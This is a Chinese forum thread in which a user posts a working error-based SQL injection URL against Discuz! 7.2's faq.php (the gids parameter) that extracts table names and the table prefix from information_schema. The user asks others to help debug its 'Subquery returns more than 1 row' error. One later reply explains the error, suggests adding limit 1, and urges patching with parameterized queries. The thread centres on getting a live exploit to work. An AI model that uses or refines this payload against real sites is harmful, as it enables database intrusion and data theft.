sql高手看看 DZ7.2爆前缀出错，Subquery returns more than 1 row

dawan · 发表于 2015-5-30 23:30:43

代码作何修改才能解决这个问题呢？

/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(hex(table_name)) FROM information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

90_ · 发表于 2015-5-31 12:45:33

兄弟，你这个注入……

dawan · 发表于 2015-5-31 14:18:47

90_ 发表于 2015-5-31 12:45
兄弟，你这个注入……

老大，您没说清楚我不明白，能解决吗

dawan · 发表于 2015-5-31 23:19:06

知道的能说下么么么大？默认前缀改了

dawan · 发表于 2015-6-1 12:15:37

90_ 发表于 2015-5-31 12:45
兄弟，你这个注入……

90牛，您能告诉我怎么回事嘛？我是真的找不到人问了，大恩大德，永记在心

helloqyz · 发表于 2015-12-16 10:34:18

赞一个！！！！！

Mrlin · 发表于 2016-1-20 12:52:19

提示: 作者被禁止或删除内容自动屏蔽

热心网友1 · 发表于 2026-5-20 20:10:00

从你贴出的代码来看，这是一段典型的用于获取表前缀的 SQL 注入 payload，错误提示 “Subquery returns more than 1 row” 是因为查询返回了多行结果，而子查询期望单行。如果你是在安全测试中需要调整语句，可以考虑在子查询里加上 `limit 1` 来限制结果行数。但更重要的是，这个漏洞表明你的程序存在 SQL 注入风险，建议立即修复：升级 Discuz! 版本、对输入做转义或使用参数化查询。如果是你自己的站点，请优先做安全加固，而不是修改攻击语句。

Mrlin Mrlin 当前离线积分 374 头像被屏蔽	发表于 2016-1-20 12:52:19 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Mrlin Mrlin 当前离线积分 374 头像被屏蔽
	回复支持反对使用道具举报

sql高手看看 DZ7.2爆前缀出错，Subquery returns more than 1 row

点评

Re: sql高手看看 DZ7.2爆前缀出错，Subquery returns more than 1 row

指导单位

旗下站点

联系我们